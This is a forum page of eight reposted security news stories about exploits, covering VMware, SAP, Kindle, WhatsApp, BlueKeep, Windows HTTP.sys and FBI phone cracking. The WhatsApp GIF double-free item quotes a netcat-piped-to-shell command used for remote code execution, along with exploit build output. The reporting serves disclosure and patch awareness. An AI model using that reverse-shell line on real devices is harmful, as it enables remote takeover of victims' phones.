Search the Community

Showing results for tags 'exploit'.

Found 8 results

  1. Proof-of-concept exploit code is now available online for a critical authentication bypass vulnerability in multiple VMware products that allows attackers to gain admin privileges.

     VMware released security updates to address the CVE-2022-22972 flaw affecting Workspace ONE Access, VMware Identity Manager (vIDM), or vRealize Automation. The company also shared temporary workarounds for admins who cannot patch vulnerable appliances immediately, requiring them to disable all users except one provisioned administrator.

     Horizon3 security researchers released a proof-of-concept (PoC) exploit and technical analysis for this vulnerability today, following an announcement made on Tuesday that a CVE-2022-22972 PoC would be made available later this week.

     "This script can be used to bypass authentication on vRealize Automation 7.6 using CVE-2022-22972," the researchers said. "Workspace ONE and vIDM have different authentication endpoints, but the crux of the vulnerability remains the same.

     "While Shodan only shows a limited number of VMware appliances exposed to attacks that would target this bug, there are several healthcare, education industry, and state government organizations with an increased risk of being targeted. CVE-2022-22972 is a relatively simple 'Host' header manipulation vulnerability. Motivated attackers would not have a hard time developing an exploit for this vulnerability," Horizon3 added.

     [Image: Successful login as vRealize Automation admin (Horizon3)]

     Critical security flaw with "serious" ramifications

     "This critical vulnerability should be patched or mitigated immediately per the instructions in VMSA-2021-0014," VMware warned last week. "The ramifications of this vulnerability are serious. Given the severity of the vulnerability, we strongly recommend immediate action."

     The Cybersecurity and Infrastructure Security Agency (CISA) further highlighted this security flaw's severity level by issuing a new Emergency Directive that ordered Federal Civilian Executive Branch (FCEB) agencies to urgently update or remove VMware products from their networks.

     In April, VMware patched two more critical vulnerabilities, a remote code execution bug (CVE-2022-22954) and a 'root' privilege escalation (CVE-2022-22960) in VMware Workspace ONE Access and VMware Identity Manager.

     Although the CVE-2022-22972 VMware auth bypass is not yet exploited in the wild, attackers started abusing the ones addressed in April within 48 hours to backdoor vulnerable systems and deploy coin miners.

     "CISA expects threat actors to quickly develop a capability to exploit these newly released vulnerabilities in the same impacted VMware products," the cybersecurity agency said.

     Source: Exploit released for critical VMware auth bypass bug, patch now
  2. Scanning Activity Detected After Release of Exploit for Critical SAP SolMan Flaw

     A Russian researcher has made public on GitHub a functional exploit targeting a critical vulnerability that SAP patched in its Solution Manager product in March 2020.

     Solution Manager (SolMan) was designed to provide central management for SAP and non-SAP systems and requires the Solution Manager Diagnostic Agent (SMDAgent) to be installed on each host for the management of communications, monitoring, and diagnostics.

     Tracked as CVE-2020-6207 and featuring a CVSS score of 10, the security flaw is a missing authorization check in the EEM Manager component of SolMan, which could allow an unauthenticated, remote attacker to execute operating system commands on hosts as the SMDAgent.

     The researcher who published the fully functional exploit for the bug on GitHub claims the project is for educational purposes only, and that it “cannot be used for law violation or personal gain.”

     Following the publication of the exploit, however, security researchers at Onapsis, a firm that specializes in securing SAP applications, have observed scanning in the wild for vulnerable systems.

     It’s not common for proof-of-concept (PoC) exploits targeting SAP vulnerabilities to be made public, Onapsis says, adding that the availability of the code will likely result in an increase in exploitation attempts from both SAP-expert adversaries and script kiddies.

     “A successful attack exploiting this vulnerability would put an organization’s mission-critical SAP applications, business process and data at risk—impacting cybersecurity and regulatory compliance,” Onapsis notes.

     Being an administrative system, SolMan “has connections and trust relationships with every SAP system throughout the landscape,” and an attacker able to compromise it would essentially gain access to any business system connected to it, the security firm warns.

     Attackers looking to exploit the vulnerability need access to the SolMan HTTP(s) port. The remote attacker would gain control of the affected system with admin privileges, enabling them to conduct a wide range of activities.

     “An attacker will need network visibility to SolMan as this system is not frequently exposed to the Internet. So for most companies, risk of this exploit should be mostly limited to internal attacks (unless external attackers have already compromised another system and are inside the network),” Onapsis explains.

     Organizations that have already applied the available patches are not exposed to attacks leveraging this or other similar exploits. According to Onapsis, however, SolMan is often overlooked when it comes to patching, mainly because it does not hold any business information.

     Source: Scanning Activity Detected After Release of Exploit for Critical SAP SolMan Flaw
  3. Amazon Awards $18,000 for Exploit Allowing Kindle E-Reader Takeover

     Amazon has awarded an $18,000 bug bounty for an exploit chain that could have allowed an attacker to take complete control of a Kindle e-reader simply by knowing the targeted user’s email address.

     The attack, dubbed KindleDrip, was discovered in October 2020 by Yogev Bar-On, a researcher at Israel-based cybersecurity consulting firm Realmode Labs. KindleDrip involved the exploitation of three different security holes, all of which were addressed by Amazon.

     The first vulnerability in the exploit chain was related to the “Send to Kindle” feature, which allows users to send an e-book in MOBI format to their Kindle device via email as an attachment. Amazon generates an @kindle.com email address where a user can send e-books as an attachment from a list of email addresses approved by the user.

     Bar-On discovered that he could abuse this feature to send a specially crafted e-book that would allow him to execute arbitrary code on the targeted device. The malicious e-book achieved code execution by leveraging a vulnerability related to a library used by the Kindle to parse JPEG XR images. Exploitation required the user to click on a link inside an e-book that contained a malicious JPEG XR image, which would result in a web browser opening and the attacker’s code getting executed with limited privileges.

     The researcher also discovered a vulnerability that allowed him to escalate privileges and execute the code as root, which gave him complete access to the device.

     “The attacker could access device credentials and make purchases on the Kindle store using the victim’s credit card. Attackers could sell an e-book on the store and transfer money to their account,” Bar-On explained in a blog post. “At least the confirmation email would make the victim aware of the purchase.”

     It's worth noting that an attacker could not gain access to actual credit card numbers or passwords through such an attack because this type of data is not stored on the device. Instead, they could obtain special tokens that can be used to access the victim's account.

     An attacker would have only needed the targeted user’s email address and to convince the victim to click on a link inside the malicious e-book. While the Send to Kindle feature only allows users to send e-books from pre-approved email addresses, the researcher pointed out that an attacker could have simply used an email spoofing service. The prefix of the @kindle.com email address of the targeted user is in many cases the same as their regular email.

     The security holes that required changes to the Kindle firmware — the code execution and privilege escalation issues — were patched in December with the release of version 5.13.4. Amazon now also sends a verification link to email addresses that cannot be authenticated, it adds a few characters to some email aliases to make them more difficult to guess, and systems are in place to prevent brute-forcing of the email address. Kindle users do not need to take any action.

     A video has been published to show how a KindleDrip attack worked.

     “The security of our devices and services is a top priority. We have already released an automatic software update over the Internet fixing this issue for all Amazon Kindle models released after 2014,” an Amazon spokesperson told SecurityWeek. “Other impacted Kindle models will also receive this fix. We also have measures in place to help prevent customers from receiving content they haven’t requested. We appreciate the work of independent researchers who help bring potential issues to our attention.”

     *Updated with statement and clarifications from Amazon

     Source: Amazon Awards $18,000 for Exploit Allowing Kindle E-Reader Takeover
  4. WhatsApp has fixed a vulnerability involving malicious MP4 video files that could potentially allow an attacker to remotely access messages and files stored in the app.

     The flaw — identified as CVE-2019-11931 — made it possible for attackers to send a specially crafted MP4 file to remotely execute malicious code on the victim’s device without any intervention.

     In an advisory posted on its site, Facebook said:

     However, the presence of the flaw alone doesn’t mean it could be used for nefarious purposes. As is often the case, it can be an entry point for an exploit chain that links together a group of security vulnerabilities, thereby allowing a hacker to penetrate digital protections.

     When we reached out for a response, a spokesperson for the company said, “WhatsApp is constantly working to improve the security of our service. We make public reports on potential issues we have fixed consistent with industry best practices. In this instance there is no reason to believe users were impacted.”

     The bug affected Android versions prior to 2.19.274, iOS versions prior to 2.19.100, Enterprise Client versions prior to 2.25.3, Windows Phone versions before and including 2.18.368, Business for Android versions prior to 2.19.104, and Business for iOS versions prior to 2.19.100.

     While there’s no indication that the flaw was exploited, the disclosure comes weeks after WhatsApp revealed that at least two dozen academics, lawyers, Dalit activists, and journalists in India were the target of surveillance by threat operators using security firm NSO Group’s Pegasus spyware. The social media giant has also sued the Israeli company for exploiting a now-fixed video calling flaw in the WhatsApp service to surveil over 1,400 users.

     In the meantime, it is crucial that you update WhatsApp to the latest version to mitigate the risk of exploit.

     Source: WhatsApp fixes bug that would have let hackers exploit devices using MP4 files (via The Next Web)

     p/s: This news is posted under Security & Privacy News instead of Mobile News, as it highlights the security issue found in older WhatsApp versions for mobile OSes.
  5. After months of warnings, the first successful attack using Microsoft's BlueKeep vulnerability has arrived—but isn't nearly as bad as it could have been.

     Microsoft first announced the BlueKeep vulnerability in May; now, hackers have finally caught up with it. When Microsoft revealed last May that millions of Windows devices had a serious hackable flaw known as BlueKeep—one that could enable an automated worm to spread malware from computer to computer—it seemed only a matter of time before someone unleashed a global attack. As predicted, a BlueKeep campaign has finally struck. But so far it's fallen short of the worst case scenario.

     Security researchers have spotted evidence that their so-called honeypots—bait machines designed to help detect and analyze malware outbreaks—are being compromised en masse using the BlueKeep vulnerability. The bug in Microsoft's Remote Desktop Protocol allows a hacker to gain full remote code execution on unpatched machines; while it had previously only been exploited in proofs of concept, it has potentially devastating consequences. Another worm that targeted Windows machines in 2017, the NotPetya ransomware attack, caused more than 10 billion dollars in damage worldwide.

     But so far, the widespread BlueKeep hacking merely installs a cryptocurrency miner, leeching a victim's processing power to generate cryptocurrency. And rather than a worm that jumps unassisted from one computer to the next, these attackers appear to have scanned the internet for vulnerable machines to exploit. That makes this current wave unlikely to result in an epidemic.

     "BlueKeep has been out there for a while now. But this is the first instance where I’ve seen it being used on a mass scale," says Marcus Hutchins, a malware researcher for security firm Kryptos Logic who was one of the first to build a working proof-of-concept for the BlueKeep vulnerability. "They’re not seeking targets. They’re scanning the internet and spraying exploits."

     Hutchins says that he first learned of the BlueKeep hacking outbreak from fellow security researcher Kevin Beaumont, who observed his honeypot machines crashing over the last few days. Since those devices exposed only port 3389 to the internet—the port used by RDP—he quickly suspected BlueKeep. Beaumont then shared a "crashdump," forensic data from those crashed machines, with Hutchins, who confirmed that BlueKeep was the cause, and that the hackers had intended to install a cryptocurrency miner on the victim machines. Hutchins says he hasn’t yet determined which coin they’re trying to mine, and notes that the fact the target machines crash indicates that the exploit may be unreliable.

     The malware's authors appear to be using a version of the BlueKeep hacking technique included in the open-source hacking and penetration testing framework Metasploit, Hutchins says, which was made public in September.

     It's also unclear how many devices have been impacted, although the current BlueKeep outbreak appears to be far from the RDP pandemic that many feared. "I've seen a spike, but not the level I'd expect from a worm," says Jake Williams, a founder of the security firm Rendition Infosec, who has been monitoring his clients' networks for signs of exploitation. "It hasn’t hit critical mass yet."

     In fact, Williams argues, the absence of a more severe wave of BlueKeep hacking so far may actually indicate a success story for Microsoft's response to its BlueKeep bug—an unexpected happy ending. "Every month that passes by without a worm happening, more people patch and the vulnerable population goes down," Williams says. "Since the Metasploit module has been out for a couple of months now, the fact that no one has wormed this yet seems to indicate there’s been a cost-benefit analysis and there’s not a huge benefit to weaponizing it."

     But the threat BlueKeep poses to hundreds of thousands of Windows machines hasn't passed just yet. About 735,000 Windows computers remained vulnerable to BlueKeep according to one internet-wide scan by Rob Graham, a security researcher and founder of Errata Security, who shared those numbers with WIRED in August. And those machines could still be hit with a more serious—and more virulent—specimen of malware that exploits Microsoft's lingering RDP vulnerability. That could take the form of a ransomware worm in the model of NotPetya or WannaCry, which infected almost a quarter million computers when it spread in May of 2017, causing somewhere between $4 and $8 billion in damage.

     In the meantime, the current spate of BlueKeep cryptocurrency mining will represent an annoyance for those unlucky enough to have their computers crashed or hijacked by it—and at most a vague harbinger of a more severe attack on the horizon. "A BlueKeep exploit is perfect for getting more systems to mine from," says Hutchins. "It’s not necessarily going to affect whether someone still makes a ransomware worm at some point."

     If helping hackers mine a few cryptocoins is the worst that BlueKeep ultimately inflicts, in other words, the internet will have dodged a bullet.

     Source
  6. A researcher discovered a double-free vulnerability in WhatsApp for Android that could be exploited by remote attackers to execute arbitrary code on the vulnerable device.

     A security researcher who goes online by the moniker Awakened discovered a double-free vulnerability in WhatsApp for Android and demonstrated how to leverage it to remotely execute arbitrary code on the target device. The expert reported the issue to Facebook, which acknowledged and addressed the flaw with the release of WhatsApp version 2.19.244.

     The expert discovered that the flaw resides in DDGifSlurp in decoding.c in the libpl_droidsonroids_gif.so library, used to generate the preview of a GIF file when a user opens the Gallery view in the popular messaging application to send a media file.

     “When the WhatsApp Gallery is opened, the said GIF file triggers the double-free bug on rasterBits buffer with size sizeof(GifInfo). Interestingly, in WhatsApp Gallery, a GIF file is parsed twice. When the said GIF file is parsed again, another GifInfo object is created,” reads a technical analysis published by the expert. “Because of the double-free behavior in Android, GifInfo info object and info->rasterBits will point to the same address. DDGifSlurp() will then decode the first frame to info->rasterBits buffer, thus overwriting info and its rewindFunction(), which is called right at the end of DDGifSlurp() function.”

     The expert was able to craft a GIF file to control the PC register, then successfully achieved remote code execution by executing the following command:

     system("toybox nc 192.168.2.72 4444 | sh");

     The expert highlighted that it was not possible to point directly to the system() function in libc.so; instead, it was necessary to first let PC jump to an intermediate gadget.

     “We need an information disclosure vulnerability that gives us the base address of libc.so and libhwui.so. That vulnerability is not in the scope of this blogpost,” continues the expert. “Note that the address of system() and the gadget must be replaced by the actual address found by an information disclosure vulnerability.”

     The expert developed code that was able to generate a corrupted GIF file that could exploit the vulnerability:

     $ gcc -o exploit egif_lib.c exploit.c
     .....
     $ ./exploit
     buffer = 0x7ffc586cd8b0
     size = 266

     He then copied the content into a GIF file and sent it as a Document via WhatsApp to another WhatsApp user. The researcher explained that the crafted GIF file could not be sent as a Media file, because WhatsApp attempts to convert it into an MP4 before sending it.

     The vulnerability is triggered when the target user who has received the malicious GIF file opens the WhatsApp Gallery to send a media file to a friend. Below are the attack vectors devised by the expert:

     Local privilege escalation (from a user app to WhatsApp): A malicious app is installed on the Android device. The app collects addresses of zygote libraries and generates a malicious GIF file that results in code execution in WhatsApp context. This allows the malware app to steal files in the WhatsApp sandbox, including the message database.

     Remote code execution: Pairing with an application that has a remote memory information disclosure vulnerability (e.g. a browser), the attacker can collect the addresses of zygote libraries and craft a malicious GIF file to send to the user via WhatsApp (must be as an attachment, not as an image through Gallery Picker). When the user opens the Gallery view in WhatsApp, the GIF file will trigger a remote shell in WhatsApp context.

     The exploit works for WhatsApp version 2.19.230 and prior versions; the company addressed it with the release of version 2.19.244. The exploit works for Android 8.1 and 9.0, but the expert explained that it does not work for Android 8.0 and below.

     “In the older Android versions, double-free could still be triggered. However, because of the calls by the system after the double-free, the app just crashes before reaching to the point that we could control the PC register,” concludes the expert.

     Pierluigi Paganini (SecurityAffairs – WhatsApp, hacking)

     Source: Security Affairs
  7. Exploit released for Windows 10 HTTP protocol flaw that was fixed by update KB5003173

     Security researcher Axel Souchet has released proof of concept code on GitHub that exploits CVE-2021-31166. Luckily, this CVE was patched by Microsoft with the release of KB5003173 during the May 2021 Patch Tuesday. The proof of concept code lacks auto-spreading capabilities, but malicious actors could develop their own code similar to his to perform remote code execution. Execution of Souchet's demonstration code triggers a blue screen of death.

     "I've built a PoC for CVE-2021-31166 the "HTTP Protocol Stack Remote Code Execution Vulnerability": https://t.co/8mqLCByvCp 🔥🔥 pic.twitter.com/yzgUs2CQO5" — Axel Souchet (@0vercl0k) May 16, 2021

     Axel further explains: "The bug itself happens in http!UlpParseContentCoding where the function has a local LIST_ENTRY and appends items to it. When it's done, it moves it into the Request structure; but it doesn't NULL out the local list. The issue with that is that an attacker can trigger a code-path that frees every entry of the local list leaving them dangling in the Request object."

     Microsoft recommends prioritizing patching all affected servers since the bug is wormable and, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted server utilizing the HTTP Protocol Stack (HTTP.sys) to process packets. Systems running the latest version of Windows 10 that are fully patched should be safe from attacks.

     Source: GitHub via BleepingComputer

     Source: Exploit released for Windows 10 HTTP protocol flaw that was fixed by update KB5003173
  8. It's using counterterrorism tools against civil disobedience.

     Federal agents tend to focus their phone cracking efforts on terrorists, but they appear to have shifted their attention to civil disobedience. NYR Daily has learned that the FBI sent its “Fly Team” counterterrorism unit to Portland in mid-July to conduct the “initial exploitation” of phones and other devices used by people protesting police racism and violence. The email revealing the plan, from now-retired special agent George Chamberlain, also asked for help with the “investigative follow up.”

     There’s a concern that the FBI may have been pushing the limits of its device search powers in the process. Fly Team co-creator Raymond Holcomb told NYR that it’s unclear what authority the FBI unit had to search the phones, and whether or not agents had consent or warrants. The Fly Team was formed to tackle counterterrorism with a “different set of tools,” not everyday protesters. Members of the House Committee on Homeland Security have lately worried that federal agents have held on to seized phones for months.

     The FBI declined to comment on the details of the operation, citing the “ongoing nature” of cases like this. It maintained that the Portland activity met “all of our legal requirements,” and that it had “not been focused on peaceful protests.”

     Those claims might not be enough to satisfy some critics. Senator Ron Wyden has demanded clarity on FBI and Homeland Security activity in Portland, saying that it would be “outrageous” if Oregon residents faced federal surveillance like phone exploits due solely to their politics. Without transparency, it’s not certain that the FBI or DHS respected protesters’ digital rights.

     Source